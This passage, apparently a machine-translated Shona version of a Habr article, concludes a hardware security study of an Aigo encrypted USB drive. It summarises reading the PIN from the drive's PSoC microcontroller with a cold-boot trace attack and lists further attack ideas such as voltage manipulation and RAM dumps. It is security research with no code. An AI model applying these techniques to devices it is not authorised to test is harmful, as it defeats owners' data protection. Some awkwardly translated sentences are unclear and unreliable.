Saka, ngatipfupikisai padivi rePSoC, mumamiriro ezvinhu eAigo drive yedu:
- tinogona kuverenga SRAM kunyangwe ikaverengwa yakachengetedzwa;
- Isu tinokwanisa kupfuura iyo anti-swipe dziviriro nekushandisa inotonhora bhoti trace kurwisa uye nekuverenga zvakananga PIN kodhi.
Nekudaro, kurwisa kwedu kune kumwe kukanganisa nekuda kwematambudziko ekuyananisa. Inogona kuvandudzwa sezvinotevera:
- nyora utility kuti unyatso kudhirodha data yakabuda iyo inowanikwa semhedzisiro ye "inotonhora boot trace" kurwisa;
- shandisa gadget yeFPGA kugadzira kunonoka nguva (kana kushandisa Arduino hardware timers);
- edza kumwe kurwiswa: isa nemaune PIN kodhi, reboot uye kurasira RAM, uchitarisira kuti iyo chaiyo PIN kodhi ichachengetwa mu RAM kuenzanisa. Nekudaro, izvi hazvisi nyore kuita paArduino, sezvo iyo Arduino chiratidzo chiyero chiri 5 volts, nepo bhodhi yatiri kuongorora inoshanda nemasaini 3,3 volt.
Chinhu chimwe chinonakidza chinogona kuyedzwa kutamba nevoltage level kunzvenga chengetedzo yekuverenga. Kana nzira iyi ikashanda, taizokwanisa kuwana data rakakwana kubva kune flash drive - panzvimbo yekuvimba nekuverenga cheki nekunonoka kunonoka kwenguva.
Sezvo iyo SROM ingangoverenga mabheti evarindi kuburikidza neReadBlock system call, isu tinogona kuita zvakafanana paDmitry Nedospasov's blog - kuitazve kurwiswa kwaChris Gerlinski, kwakaziviswa pamusangano. .
Chimwe chinhu chinonakidza chingaitwe kukuya nyaya kubva kuchip: kutora SRAM dump, kuona isina kunyorwa nharembozha yekufona uye kusasimba.
9. Mhedziso
Saka, kuchengetedzwa kwemotokari iyi kunosiya zvakawanda zvingadiwa, nokuti inoshandisa nguva dzose (kwete "yakaoma") microcontroller kuchengetedza PIN code ... Uyezve, handisati ndatarisa (zvakadaro) kuti zvinhu zviri kufamba sei nedata. encryption pachigadzirwa ichi!
Chii chaungakurudzira kuAigo? Mushure mekuongorora akati wandei emhando dzakavharidzirwa HDD madhiraivha, muna 2015 ndakagadzira paSyScan, maakaongorora matambudziko ekuchengetedza emamwe madhiraivha ekunze eHDD, uye akaita kurudziro pane zvingagadziriswe mazviri. π
Ndakapedza kupera kwevhiki mbiri uye manheru akati wandei ndichiita tsvakiridzo iyi. Huwandu hwemaawa angangoita makumi mana. Kuverenga kubva pakutanga (pandakavhura dhisiki) kusvika kumagumo (Pin code dump). Maawa makumi mana mamwe chetewo anosanganisira nguva yandakapedza kunyora chinyorwa ichi. Rwakanga rwuri rwendo rwunofadza zvikuru.
Source: www.habr.com